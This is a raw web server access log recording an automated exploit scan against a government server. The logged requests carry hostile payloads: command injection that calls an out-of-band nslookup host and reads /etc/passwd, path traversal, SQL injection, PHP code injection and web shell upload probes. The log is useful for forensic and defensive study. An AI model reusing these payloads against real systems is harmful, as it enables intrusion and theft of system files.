/webadmin/script command=|%20nslookup%20ctbq6epdf88k4t1c60lgjfefnqxmwncu5.oast.pro 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.18 - 404 7 0 24 2024-12-10 03:30:29 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27";user|s."1337"; 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 28 2024-12-10 03:30:30 103.153.214.94 GET /maint/modules/home/index.php lang=english|cat%20/etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 25 2024-12-10 03:32:54 103.153.214.94 POST /wls-wsat/RegistrationRequesterPortType - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 27 2024-12-10 03:34:09 103.153.214.94 PUT /poc.jsp/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.1+Safari/605.1.15 - 404 7 0 28 2024-12-10 03:34:09 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.24+(KHTML,+like+Gecko)+Version/17.2+Safari/616.24 - 404 7 0 29 2024-12-10 03:34:10 103.153.214.94 GET /poc.jsp cmd=cat+%2Fetc%2Fpasswd 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 39 2024-12-10 03:34:11 103.153.214.94 GET /2q0PiLKQHsqv4JkpWpoao7ro3ON.php/x0A - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 33 2024-12-10 03:36:46 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/46.0.2486.0+Safari/537.36+Edge/13.10586 - 404 7 0 26 2024-12-10 03:37:45 103.153.214.94 PUT /2q0PiLcUtOfESWWBdtXPWKo5JnC.jsp/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 24 2024-12-10 03:37:48 103.153.214.94 GET /2q0PiLcUtOfESWWBdtXPWKo5JnC.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 22 2024-12-10 03:39:36 103.153.214.94 POST /jolokia/read/getDiagnosticOptions - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.17 - 404 7 0 27 2024-12-10 03:39:37 103.153.214.94 POST /cobbler_api - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 22 2024-12-10 03:39:59 103.153.214.94 POST /integration/saveGangster.action - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 03:40:20 103.153.214.94 GET /__ - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 33 2024-12-10 03:40:52 103.153.214.94 GET /__debugging_center_utils___.php log=;echo%20ekieegwsdrnoowvszzctlhqhyljrbqxd%20|%20id 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 24 2024-12-10 03:40:55 103.153.214.94 GET /__debugging_center_utils___.php log=;echo%20ekieegwsdrnoowvszzctlhqhyljrbqxd%20|%20ipconfig 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:105.0)+Gecko/20100101+Firefox/105.0 - 404 7 0 22 2024-12-10 03:41:56 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 24 2024-12-10 03:41:59 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 23 2024-12-10 03:43:13 103.153.214.94 POST /nagiosql/admin/logbook.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-10 03:44:51 103.153.214.94 POST /invoker/JMXInvokerServlet/ - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 64 2024-12-10 03:44:56 103.153.214.94 POST /invoker/EJBInvokerServlet/ - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 22 2024-12-10 03:44:58 103.153.214.94 POST /invoker/readonly - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 03:45:23 103.153.214.94 POST /nagiosql/admin/menuaccess.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 27 2024-12-10 03:45:38 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 03:45:40 103.153.214.94 GET /hw-sys.htm - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/25.0.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 24 2024-12-10 03:47:20 103.153.214.94 POST /clients/editclient.php id=2q0PiRT0CAHabT4IsOzNZ1tIxL7&action=update 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 29 2024-12-10 03:47:23 103.153.214.94 GET /logos_clients/2q0PiRT0CAHabT4IsOzNZ1tIxL7.php - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 03:48:23 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 03:49:11 103.153.214.94 POST /upload/index.php route=extension/payment/divido/update 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 26 2024-12-10 03:51:10 103.153.214.94 POST /api/external/7.0/system.System.get_infos - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 28 2024-12-10 03:52:32 103.153.214.94 POST /struts2-rest-showcase/orders/3 - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 27 2024-12-10 03:52:37 103.153.214.94 POST /orders/3 - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 23 2024-12-10 03:53:25 103.153.214.94 POST /account - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 25 2024-12-10 03:53:25 103.153.214.94 POST /account - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 22 2024-12-10 03:53:48 103.153.214.94 PUT /meta - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 25 2024-12-10 03:54:07 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 03:54:09 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 29 2024-12-10 03:56:25 103.153.214.94 POST /filemanager/upload.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.20.13+(KHTML,+like+Gecko)+Version/17.7.74+Safari/616.20.13 - 404 7 0 29 2024-12-10 03:57:29 103.153.214.94 POST /modules/attributewizardpro/file_upload.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/110.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 03:57:43 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 24 2024-12-10 03:59:10 103.153.214.94 POST /web/google_analytics.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 32 2024-12-10 03:59:20 103.153.214.94 POST /upload - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 24 2024-12-10 03:59:22 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:108.0)+Gecko/20100101+Firefox/108.0 - 404 7 0 24 2024-12-10 04:00:52 103.153.214.94 POST /system/sharedir.php - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 04:00:55 103.153.214.94 POST /en/php/usb_sync.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.18 - 404 7 0 23 2024-12-10 04:01:44 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.26 https://bcvt.kontum.gov.vn:8172 404 7 0 31 2024-12-10 04:08:07 103.153.214.94 POST /wp-content/plugins/wp-payeezy-pay/donate.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Mobile/15E148+Safari/604.1 - 404 7 0 30 2024-12-10 04:08:07 103.153.214.94 POST /XMLCHART - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 25 2024-12-10 04:08:47 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.1+Safari/605.1.15 - 404 7 0 26 2024-12-10 04:08:51 103.153.214.94 GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2q0PiKq9KnF9iaTssNj4c9KkA2X.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 04:12:31 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.34 - 404 7 0 26 2024-12-10 04:12:34 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 29 2024-12-10 04:13:55 103.153.214.94 POST /index.php option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 29 2024-12-10 04:13:56 103.153.214.94 POST /soap.cgi service=whatever-control;curl 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15-620 - 404 7 0 24 2024-12-10 04:14:29 103.153.214.94 POST /login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.1+Safari/605.1.15 - 404 7 0 23 2024-12-10 04:14:37 103.153.214.94 POST /php/upload.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.5112.81+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 25 2024-12-10 04:14:39 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 22 2024-12-10 04:14:40 103.153.214.94 GET /Uploads/2q0PiPTl2qbyyGPhhOtqI0OjCKr.php7 - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 04:14:42 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 22 2024-12-10 04:17:34 103.153.214.94 POST /user/register element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 bcvt.kontum.gov.vn:8172/user/register 404 7 0 27 2024-12-10 04:20:01 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 27 2024-12-10 04:20:01 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 04:20:15 103.153.214.94 POST /webtools/control/xmlrpc - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 04:20:27 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 26 2024-12-10 04:20:31 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 23 2024-12-10 04:21:26 103.153.214.94 GET /assets/file:/etc/passwd - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 400 0 0 25 2024-12-10 04:22:18 103.153.214.94 GET /login - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 28 2024-12-10 04:22:19 103.153.214.94 GET / echo+VEOYRxWUWz 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 22 2024-12-10 04:27:22 103.153.214.94 POST /checkValid - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 04:27:29 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 31 2024-12-10 04:28:22 103.153.214.94 POST /ws_utc/resources/setting/options - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 27 2024-12-10 04:28:25 103.153.214.94 POST /ws_utc/resources/setting/keystore - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 26 2024-12-10 04:28:38 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 04:33:29 103.153.214.94 GET / - 8172 - 206.168.34.193 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 7 0 253 2024-12-10 04:33:34 103.153.214.94 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 28 2024-12-10 04:33:37 103.153.214.94 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 25 2024-12-10 04:33:40 103.153.214.94 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 43 2024-12-10 04:33:45 103.153.214.94 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 26 2024-12-10 04:33:49 103.153.214.94 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 04:33:51 103.153.214.94 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 04:34:45 103.153.214.94 GET /wan.htm - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 25 2024-12-10 04:37:11 103.153.214.94 POST /password_change.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+(.NET+CLR+3.5.30729) https://bcvt.kontum.gov.vn:8172 404 7 0 28 2024-12-10 04:38:38 103.153.214.94 POST /rpc.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 25 2024-12-10 04:38:38 103.153.214.94 POST /session_login.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 28 2024-12-10 04:38:38 103.153.214.94 POST /rpc.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 25 2024-12-10 04:38:38 103.153.214.94 POST /session_login.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 https://bcvt.kontum.gov.vn:8172 404 7 0 48 2024-12-10 04:39:05 103.153.214.94 POST /crowd/admin/uploadplugin.action - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/107.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 04:39:10 103.153.214.94 GET /crowd/plugins/servlet/exp - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 04:39:59 103.153.214.94 GET /wp-content/plugins/visualizer/readme.txt - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14816.131.5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 04:40:30 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 46 2024-12-10 04:41:53 103.153.214.94 POST /admin/ n=language&c=language_general&a=doExportPack 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 22 2024-12-10 04:41:53 103.153.214.94 POST /ui/api/v1/ui/auth/login - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 29 2024-12-10 04:42:12 103.153.214.94 GET /login - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 25 2024-12-10 04:42:16 103.153.214.94 POST /Collector/diagnostics/ping - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/73.0.3683.75+Safari/537.36 - 404 7 0 26 2024-12-10 04:42:35 103.153.214.94 GET /jnoj/web/polygon/problem/viewfile id=1&name=../../../../../../../etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 29 2024-12-10 04:42:35 103.153.214.94 POST /getcfg.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.7.24 - 404 7 0 41 2024-12-10 04:43:50 103.153.214.94 GET /login - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 04:43:54 103.153.214.94 POST /Collector/diagnostics/trace_route - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 24 2024-12-10 04:48:17 103.153.214.94 POST /admin/auth/reset-password - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 24 2024-12-10 04:52:31 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 28 2024-12-10 04:53:02 103.153.214.94 GET /login - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 25 2024-12-10 04:53:04 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 24 2024-12-10 04:53:07 103.153.214.94 GET /talari/app/files/2q0PicIJtNJgUZqQdghrlFSV8Kz - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.26 - 404 7 0 24 2024-12-10 04:53:48 103.153.214.94 POST /boafrm/formSysCmd - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 41 2024-12-10 04:55:13 103.153.214.94 GET / pum_action=tools_page_tab_system_info 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.65 - 404 7 0 25 2024-12-10 04:55:17 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 48 2024-12-10 04:56:08 103.153.214.94 POST /servlet/UploadServlet - 8172 - 115.146.123.211 